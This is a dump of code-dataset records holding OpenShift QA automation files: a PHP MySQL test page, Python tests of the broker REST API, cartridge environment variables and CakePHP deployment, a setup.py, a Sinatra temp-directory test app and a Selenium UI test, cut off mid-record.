INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');<br /><br />\";\n if(empty($_GET[\"size\"])) {\n $size = 500000;\n }\n else {\n $size = (int)$_GET[\"size\"];\n }\n mysql_query(\"SET autocommit=0;\");\n for($i = 0; $i < $size; $i++) {\n mysql_query(\"INSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\", $con);\n }\n mysql_query(\"COMMIT;\");\n mysql_query(\"SET autocommit=1;\");\n echo (string)$size.\" records have been inserted into mysql\";\n }\n elseif($_GET[\"action\"] == \"delete\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statement: DELETE FROM info;<br />\";\n mysql_query(\"DELETE FROM info;\", $con);\n echo \"All the records have been deleted from mysql database\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statement: SELECT * from info;<br />\";\n $result = mysql_query(\"SELECT * from info;\", $con);\n $num = mysql_num_rows($result);\n if($num > 0) {\n echo \"There are \".$num.\" records in database<br />Here's one row:\";\n $row = mysql_fetch_array($result);\n echo $row['id'],\", \",$row['data'],\"<br />\";\n }\n else {\n echo \"There is no record in database<br />\";\n }\n }\n else {\n echo \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\";\n }\n}\nmysql_query(\"COMMIT\", $con);\nmysql_close($con);\n?>\n" }, { "alpha_fraction": 0.5828945636749268, "alphanum_fraction": 0.590086042881012, "avg_line_length": 39.76439666748047, "blob_id": "1938bc9b0649151d77d7e9c381b17c3db2bc9999", "content_id": "250ba947c7ce1755a3720841c145ff6e90c7840b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7787, "license_type": "no_license", "max_line_length": 165, "num_lines": 191, "path": "/automation/open/testmodules/BI/rest/subaccount_delete.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: subaccount_delete.py\n# Date: 2012/10/02 16:08\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport brokerdb\n\n\nclass OpenShiftTest(rhtest.Test):\n #ITEST = [\"INT\", \"STG\"]\n\n def initialize(self):\n self.info(\"subaccount_delete\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.get_random_string(10)\n self.app_type = common.app_types[self.test_variant]\n self.subdomain = common.get_random_string(10)\n self.subaccount = common.get_random_string(10)\n self.gear_profile = 'small'\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass SubaccountDelete(OpenShiftTest):\n def test_method(self):\n common_options = ' -d nolinks=1 -s -k -H \"Accept:application/json\" -H \"X-Impersonate-User:%s\" -u %s:%s '%(self.subaccount, self.user_email, self.user_passwd)\n\n self.step(\"1. Create sub domain as sub account\")\n cmd = 'curl -X POST %s -d id=%s https://%s/broker/rest/domains'%(common_options, self.subdomain, self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"2. Add ssh key for sub account\")\n cmd = 'curl %s -X POST --data-urlencode name=default -d type=%s --data-urlencode content=%s https://%s/broker/rest/user/keys'%(\n common_options,\n common.get_public_key_type(),\n common.dump_public_key(),\n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('created', output)\n\n self.step(\"3. Create app with sub account\")\n cmd = 'curl %s -X POST -d name=%s -d cartridge=%s -d gear_profile=%s https://%s/broker/rest/domains/%s/applications'%(\n common_options,\n self.app_name,\n self.app_type,\n self.gear_profile,\n self.config.instance_info['ip'],\n self.subdomain)\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('was created', output)\n\n self.step(\"4. Try to delete this sub account when there is still some app belong this sub account existing.\")\n cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n common_options, \n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('has valid domain', output)\n self.assert_match('unprocessable_entity', output)\n\n self.step(\"5. Destroy app as sub account\")\n cmd = 'curl %s -X DELETE https://%s/broker/rest/domains/%s/applications/%s'%(\n common_options, \n self.config.instance_info['ip'], \n self.subdomain, \n self.app_name)\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"6. Try to delete this sub account when there is still domain belong this sub account existing.\")\n cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n common_options, \n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('has valid domain', output)\n self.assert_match('unprocessable_entity', output)\n\n self.step(\"7. Force clean sub domain as sub account\")\n cmd = 'curl %s -X DELETE -d force=true https://%s/broker/rest/domains/%s'%(\n common_options,\n self.config.instance_info['ip'], \n self.subdomain)\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"8. Delete this sub account.\")\n cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE'%(\n common_options, \n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"Log into instance, connect mongodb, run to following mongo shell to verify this sub account is indeed deleted.\")\n self.verify_mongo()\n\n #9. Log into instance, connect mongodb, run to following mongo shell to verify this sub account is indeed deleted.\n\n '''\n> db.user.findOne({\"_id\":\"<sub_account>\"})\n '''\n\n #(\"10. Repeat step 1~3, delete this subaccount with 'force' option when subaccount has domain and application associated.\")\n self.step(\"10. Create sub domain as sub account\")\n cmd = 'curl -X POST %s -d id=%s https://%s/broker/rest/domains'%(common_options, self.subdomain, self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"11. Add ssh key for sub account\")\n cmd = 'curl %s -X POST --data-urlencode name=default -d type=%s --data-urlencode content=%s https://%s/broker/rest/user/keys'%(\n common_options,\n common.get_public_key_type(),\n common.dump_public_key(),\n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('created', output)\n\n self.step(\"12. Create app with sub account\")\n cmd = 'curl %s -X POST -d name=%s -d cartridge=%s -d gear_profile=%s https://%s/broker/rest/domains/%s/applications'%(\n common_options,\n self.app_name,\n self.app_type,\n self.gear_profile,\n self.config.instance_info['ip'],\n self.subdomain)\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n self.assert_match('was created', output)\n\n self.step(\"13. DELETE with (brute) FORCE\")\n cmd = 'curl %s -X POST https://%s/broker/rest/user -X DELETE -d force=true'%(\n common_options,\n self.config.instance_info['ip'])\n (ecode, output) = common.cmd_get_status_output(cmd)\n self.assert_equal(0, ecode)\n\n self.step(\"14. Log into instance, connect mongodb, run to following mongo shell to verify this sub account is indeed deleted.\")\n self.verify_mongo()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify_mongo(self):\n mongo = brokerdb.BrokerDB(collections=['user'], force_cache=True)\n users = mongo.get_collection('user')\n for u in users:\n if u.has_key('parent_user_login'):\n if u['parent_user_login'] == self.config.OPENSHIFT_user_email:\n self.assert_not_match(str(u['_id']), self.subaccount,\n \"Found subaccount entry in mongodb, which should had been deleted: %s\"%u)\n '''\n > db.user.findOne({\"_id\":\"<sub_account>\"})\n > db.domains.find({_id:\"<namespace>\"})\n > db.applications.find({UUID::<UUID>\",name:\"<app_name>\"})\n '''\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SubaccountDelete)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of subaccount_delete.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5863651037216187, "alphanum_fraction": 0.5893149971961975, "avg_line_length": 32.52747344970703, "blob_id": "8f41e97812d49c68e53a2eef3f646cf890db39f6", "content_id": "f441d17617072b33ef6748b75b929ab65201c825", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3051, "license_type": "no_license", "max_line_length": 127, "num_lines": 91, "path": "/automation/open/testmodules/RT/scaling/exposed_gear_information.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1907][BusinessIntegration] Retrive exposed gear information for a scalable app\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.test_variant = \"php\"\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass ExposedGearInformation(OpenShiftTest):\n def verify_gear_info(self, scaled_up = False):\n # Loading gear information\n (gears, number_of_gears) = self.config.rest_api.get_gears(self.app_name)\n if scaled_up:\n expected_number_of_gears = 3\n else:\n expected_number_of_gears = 2\n\n php_proxy_exposed = True\n for gear in gears:\n for component in gear[\"components\"]:\n if component[\"name\"].startswith(\"php\") and component[\"proxy_port\"] is None and component[\"proxy_host\"] is None:\n php_proxy_exposed = False\n\n return (number_of_gears == expected_number_of_gears) and php_proxy_exposed\n\n def test_method(self):\n\n self.add_step(\n \"Creating a scalable application\",\n common.create_scalable_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_description = \"The application must be created successfully\",\n expect_return = 0)\n\n self.add_step(\n \"Getting and Verifying gear information\",\n self.verify_gear_info,\n function_parameters = [ False ],\n expect_description = \"Expected number of gears: 2, PHP proxy ports must be exposed\",\n expect_return = True) \n\n self.add_step(\n \"Scaling-up\",\n self.config.rest_api.app_scale_up,\n function_parameters = [self.app_name],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 'OK')\n\n self.add_step(\n \"Getting and Verifying gear information - the application is scaled-up\",\n self.verify_gear_info,\n function_parameters = [ True ],\n expect_description = \"Expected number of gears: 3, PHP proxy ports must be exposed\",\n expect_return = True) \n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ExposedGearInformation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5326917171478271, "alphanum_fraction": 0.5373548865318298, "avg_line_length": 33.27891159057617, "blob_id": "63c2835d5960b469512108b321b6bb9d3e9b7951", "content_id": "c2402aadca141b0bc24e46895259c1d66abc1774", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10079, "license_type": "no_license", "max_line_length": 107, "num_lines": 294, "path": "/automation/open/testmodules/BI/US2105.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: US2105.py\n# Date: 2012/10/03 10:04\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n #ITEST = [\"INT\", \"STG\"]\n\n def initialize(self):\n self.info(\"US2105\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n if common.app_types.has_key(self.test_variant):\n self.app_type = self.test_variant\n self.cart_variant = None\n else:\n self.app_type = 'php'\n self.cart_variant = self.test_variant\n self.info(\"VARIANT: %s\"%self.test_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass US2105(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.app_type],\n self.user_email, \n self.user_passwd, \n False],\n expect_return=0)\n\n if self.cart_variant is not None:\n if common.cartridge_deps.has_key(self.cart_variant):\n self.add_step(\"Embed a dep cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[common.cartridge_deps[self.cart_variant]], \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Embed a cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[self.cart_variant], \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Verify ENV\", self.verify_env, expect_return = 0)\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n def verify_zend(self):\n present = ['OPENSHIFT_ZEND_IP',\n 'OPENSHIFT_ZEND_PORT',\n 'OPENSHIFT_ZEND_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_haproxy(self):\n present = ['OPENSHIFT_HAPROXY_INTERNAL_IP',\n 'OPENSHIFT_HAPROXY_STATUS_IP',\n 'OPENSHIFT_HAPROXY_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_metrics(self):\n present = ['OPENSHIFT_METRICS_IP',\n 'OPENSHIFT_METRICS_PORT',\n 'OPENSHIFT_METRICS_LOG_DIR']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_METRICS_CTL_SCRIPT',\n 'OPENSHIFT_METRICS_GEAR_DIR']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_diy(self):\n present = ['OPENSHIFT_DIY_IP',\n 'OPENSHIFT_DIY_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_jbossas(self):\n removed = ['OPENSHIFT_JBOSS_']\n self.assert_not_match(removed, self.env_output)\n\n present = ['OPENSHIFT_JBOSSAS_IP',\n 'OPENSHIFT_JBOSSAS_PORT',\n 'OPENSHIFT_JBOSSAS_CLUSTER',\n 'OPENSHIFT_JBOSSAS_CLUSTER_PORT',\n 'OPENSHIFT_JBOSSAS_CLUSTER_PROXY_PORT',\n 'OPENSHIFT_JBOSSAS_CLUSTER_REMOTING'\n 'OPENSHIFT_JBOSSAS_MESSAGING_PORT',\n 'OPENSHIFT_JBOSSAS_MESSAGING_THROUGHPUT_PORT',\n 'OPENSHIFT_JBOSSAS_REMOTING_PORT',\n 'OPENSHIFT_JBOSSAS_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_perl(self):\n present = ['OPENSHIFT_PERL_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n def verify_mysql(self):\n removed = ['OPENSHIFT_DB_']\n self.assert_not_match(removed, self.env_output)\n\n present = ['OPENSHIFT_MYSQL_DB_GEAR_DNS',\n 'OPENSHIFT_MYSQL_DB_GEAR_UUID',\n 'OPENSHIFT_MYSQL_DB_HOST',\n 'OPENSHIFT_MYSQL_DB_USERNAME',\n 'OPENSHIFT_MYSQL_DB_PASSWORD',\n 'OPENSHIFT_MYSQL_DB_PORT',\n 'OPENSHIFT_MYSQL_DB_SOCKET',\n 'OPENSHIFT_MYSQL_DB_URL',\n 'OPENSHIFT_MYDQL_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_jbosseap(self):\n present = ['OPENSHIFT_JBOSSEAP_IP',\n 'OPENSHIFT_JBOSSEAP_PORT',\n 'OPENSHIFT_JBOSSEAP_CLUSTER',\n 'OPENSHIFT_JBOSSEAP_MESSAGING_THROUGHPUT_PORT',\n 'OPENSHIFT_JBOSSEAP_LOG_DIR',\n 'OPENSHIFT_JBOSSEAP_CLUSTER_PORT',\n 'OPENSHIFT_JBOSSEAP_CLUSTER_PROXY_PORT',\n 'OPENSHIFT_JBOSSEAP_CLUSTER_REMOTING',\n 'OPENSHIFT_JBOSSEAP_MESSAGING_PORT',\n 'OPENSHIFT_JBOSSEAP_REMOTING_PORT']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_JBOSS_']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_jenkins(self):\n present = ['JENKINS_CLIENT_DIR',\n 'JENKINS_DNS_NAME',\n 'JENKINS_HOME',\n 'JENKINS_INSTANCE_DIR',\n 'OPENSHIFT_JENKINS_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_mongodb(self):\n removed = ['OPENSHIFT_NOSQL']\n self.assert_not_match(removed, self.env_output)\n present = ['OPENSHIFT_MONGODB_DB_GEAR_DNS',\n 'OPENSHIFT_MONGODB_DB_GEAR_UUID',\n 'OPENSHIFT_MONGODB_DB_HOST',\n 'OPENSHIFT_MONGODB_DB_PASSWORD',\n 'OPENSHIFT_MONGODB_DB_PORT',\n 'OPENSHIFT_MONGODB_SOCKET',\n 'OPENSHIFT_MONGODB_DB_URL',\n 'OPENSHIFT_MONGODB_DB_USERNAME']\n self.assert_match(present, self.env_output)\n\n\n def verify_rockmongo(self):\n present = ['OPENSHIFT_ROCKMONGO_IP',\n 'OPENSHIFT_ROCKMONGO_PORT',\n 'OPENSHIFT_ROCKMONGO_LOG_DIR']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_ROCKMONGO_CTL_SCRIPT',\n 'OPENSHIFT_ROCKMONGO_GEAR_DIR']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_ruby(self):\n present = ['OPENSHIFT_RUBY_IP',\n 'OPENSHIFT_RUBY_PORT',\n 'OPENSHIFT_RUBY_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n def verify_phpmyadmin(self):\n removed = ['OPENSHIFT_PHPMYADMIN_CTL_SCRIPT',\n 'OPENSHIFT_PHPMYADMIN_GEAR_DIR']\n self.assert_not_match(removed, self.env_output)\n\n present = ['OPENSHIFT_PHPMYADMIN_IP',\n 'OPENSHIFT_PHPMYADMIN_LOG_DIR',\n 'OPENSHIFT_PHPMYADMIN_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_cron(self):\n removed = ['OPENSHIFT_BATCH_CRON_14_EMBEDDED_TYPE',\n 'OPENSHIFT_BATCH_CTL_SCRIPT', \n 'OPENSHIFT_BATCH_TYPE']\n self.assert_not_match(removed, self.env_output)\n present = ['OPENSHIFT_CRON_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_python(self):\n present = ['OPENSHIFT_PYTHON_IP',\n 'OPENSHIFT_PYTHON_LOG_DIR',\n 'OPENSHIFT_PYTHON_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_php(self):\n present = ['OPENSHIFT_PHP_IP',\n 'OPENSHIFT_PHP_LOG_DIR',\n 'OPENSHIFT_PHP_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_nodejs(self):\n present = ['OPENSHIFT_NODEJS_IP',\n 'OPENSHIFT_NODEJS_PORT',\n 'OPENSHIFT_NODEJS_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_postgresql(self):\n removed = ['OPENSHIFT_DB_']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_10gen(self):\n self.assert_match('', self.env_output)\n\n\n def verify_env(self):\n (status, self.env_output) = common.run_remote_cmd(self.app_name, \"env|grep OPENSHIFT\", quiet=True)\n self.assert_equal(status, 0, \"Unable to get env from given app\")\n eval(\"self.verify_%s()\"%self.test_variant.split('-')[0])\n #common variables to be present/removed\n present = ['OPENSHIFT_APP_DNS',\n 'OPENSHIFT_APP_NAME',\n 'OPENSHIFT_APP_UUID',\n 'OPENSHIFT_DATA_DIR',\n 'OPENSHIFT_GEAR_NAME',\n 'OPENSHIFT_GEAR_DNS',\n 'OPENSHIFT_GEAR_UUID',\n 'OPENSHIFT_HOMEDIR',\n 'OPENSHIFT_INTERNAL_IP',\n 'OPENSHIFT_INTERNAL_PORT',\n 'OPENSHIFT_REPO_DIR',\n 'OPENSHIFT_TMP_DIR']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_APP_DIR',\n 'OPENSHIFT_APP_TYPE',\n 'OPENSHIFT_GEAR_CTL_SCRIPT',\n 'OPENSHIFT_GEAR_DIR',\n 'OPENSHIFT_GEAR_TYPE',\n 'OPENSHIFT_RUNTIME_DIR',\n 'OPENSHIFT_PROXY_PORT',\n 'OPENSHIFT_RUN_DIR',\n 'OPENSHIFT_LOG_DIR']\n self.assert_not_match(removed, self.env_output)\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(US2105)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of US2105.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5798622369766235, "alphanum_fraction": 0.5880616307258606, "avg_line_length": 32.86666488647461, "blob_id": "3363d6dfd8586dcf4bf194c01a4cf217f63bf694", "content_id": "6b3b848904d92707a88a9b1fc63c62a8fa0df38a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 169, "num_lines": 90, "path": "/automation/open/testmodules/RT/cartridge/cakephp_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Cakephp framework support\nhttps://tcms.engineering.redhat.com/case/122275/\n\"\"\"\n\nimport os,sys\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Cakephp framework support\"\n\n self.app_name = \"cakephp\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = os.path.abspath(os.curdir)+\"/\"+self.app_name\n\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\n\n\nclass CakephpFrameworkSupport(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an php app\",\n common.create_app,\n function_parameters=[self.app_name,\n self.app_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Customize this app for cakephp\n self.steps_list.append(testcase.TestCaseStep(\"2.Customize this app for cakephp and Git push\",\n \"cd \"+self.git_repo+\"/php/ && cp \"+WORK_DIR+\"/app_template/cakephp.tar.gz ./ && tar xzf cakephp.tar.gz && git add . && git commit -am t && git push\",\n expect_description=\"cakephp+git push should be installed successfully\",\n expect_return=0))\n\n # 3.Check app via browser\n def get_app_url(app_name):\n def closure():\n return OSConf.get_app_url(self.app_name) + \"/cakephp/\"\n return closure\n\n test_html = \"CakePHP: the rapid development php framework\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check app via browser\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CakephpFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.536626935005188, "alphanum_fraction": 0.5468483567237854, "avg_line_length": 17.34375, "blob_id": "c83352855570e888dafc980f4d3ca7b5d46e4c22", "content_id": "e3f20bef59c96b1aa5e2505699d9ca6bd05486bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 48, "num_lines": 32, "path": "/python-simple-cmd/setup.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''Setup for scmd project\n'''\n\n\nfrom setuptools import setup, find_packages\n\n\nsetup(\n name='scmd',\n license='GPLv3',\n description='scmd is a simple cmd',\n author='Xin Gao',\n author_email='[email protected]',\n url='',\n version='0.1',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n ],\n packages = find_packages(),\n include_package_data = True,\n entry_points = {\n 'console_scripts': ['scmd=scmd:execute']\n },\n requires=[\n 'kerberos',\n 'kobo',\n 'krbcontext'\n ],\n)\n" }, { "alpha_fraction": 0.5716742873191833, "alphanum_fraction": 0.5957568883895874, "avg_line_length": 23.56338119506836, "blob_id": "917e62253668cb70d51c294582efe1b13e7ff09c", "content_id": "baabf953cbacbed0cb3a35e4efbacb633b7948d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 85, "num_lines": 71, "path": "/automation/open/testmodules/RT/security/data/polyinstantiation_tmp_dir_rack/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\n\nBundler.require\n\nget '/' do\n \"the time where this server lives is #{Time.now}\n <br /><br />check out your <a href=\\\"/agent\\\"> user_agent</a>\"\nend\n\nget '/agent' do\n \"you're using #{request.user_agent}\"\nend\n\nget '/show' do\n response_body = \"\"\n\n command1 = \"ls -l /tmp/rack_tmp_test 2>&1 && ls -l /var/tmp/rack_var_tmp_test 2>&1\"\n response_body = response_body + \"Command 1: #{command1}\" + \"\\n\"\n output = `#{command1}`\n ret1 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command = \"ls -l /tmp 2>&1\"\n response_body = response_body + \"Command: %s\" %(command) + \"\\n\"\n output = `#{command}`\n ret_tmp = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n if ret1 == 0\n response_body = response_body + \"RESULT=0\\n\"\n else\n response_body = response_body + \"RESULT=1\\n\"\n end\n\n \"#{response_body}\"\nend\n\nget '/create' do\n response_body = \"\"\n\n command1 = \"touch /tmp/rack_tmp_test 2>&1\"\n response_body = response_body + \"Command 1: #{command1}\" + \"\\n\"\n output = `#{command1}`\n ret1 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command2 = \"touch /var/tmp/rack_var_tmp_test 2>&1\"\n response_body = response_body + \"Command 2: #{command2}\" + \"\\n\"\n output = `#{command2}`\n ret2 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command = \"ls -l /tmp 2>&1\"\n response_body = response_body + \"Command: #{command}\" + \"\\n\"\n output = `#{command}`\n ret_tmp = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n if ret1 == 0 and ret2 == 0\n response_body = response_body + \"RESULT=0\\n\"\n else\n response_body = response_body + \"RESULT=1\\n\"\n end\n\n \"#{response_body}\"\n\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6029520034790039, "alphanum_fraction": 0.6332103610038757, "avg_line_length": 20.492063522338867, "blob_id": "7a0352965e5fa7b2fe383d6edfa25c7261c2fa38", "content_id": "b2affc3552f66910e3ff3e94e9e6bbdc93e83e0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 211, "num_lines": 63, "path": "/automation/open/testmodules/UI/web/case_180946.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180946.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass DeleteSpringeap6App(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a springeap6 app\n web.create_app(\"springeap6\", \"sprinteap\")\n \n time.sleep(20)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n \n\n #delete a springeap app\n web.delete_last_app(\"springeap\")\n \n\n self.tearDown()\n\n return self.passed(\" case_180946--DeleteSpringeap6App passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeleteSpringeap6App)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180946.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5915622115135193, "alphanum_fraction": 0.5976765751838684, "avg_line_length": 35.7528076171875, "blob_id": "f2ce1349a00f26cce0af5e7fcce83e8d76f681d2", "content_id": "96e9318c24e9cf451fc8d8e8a63957cfc74b0ede", 